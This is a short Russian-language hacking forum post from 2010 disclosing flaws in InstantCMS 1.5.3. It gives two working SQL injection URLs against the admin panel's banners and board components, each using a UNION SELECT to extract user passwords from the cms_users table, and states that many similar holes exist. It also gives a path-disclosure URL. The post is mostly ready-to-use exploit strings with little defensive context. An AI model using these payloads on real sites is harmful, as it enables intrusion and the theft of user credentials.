23.03.2010, 19:32
|
|
Участник форума
Регистрация: 12.07.2009
Сообщений: 158
Провел на форуме:
2510517
Репутация:
334
|
|
InstantCMS
1.5.3
SQL INJ
В админке:
1.
Код:
http://test1.ru/admin/index.php?view=components&do=config&link=banners&opt=edit&item_id=-100+and+1=1+union+select+1,2,3,4,5,6,7,8,9,10,password,12,13+from+cms_users+--+
2.
Код:
http://test1.ru/admin/index.php?view=components&do=config&link=board&opt=edit_cat&item_id=-100+union+select+1,2,3,4,5,6,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+cms_users--+
Ну и таких однотипных уязвимостей в админке множество.
P.S.
Раскрытие пути
Код:
http://localhost/admin/modules/mod_arhive/backend.php
|
|
|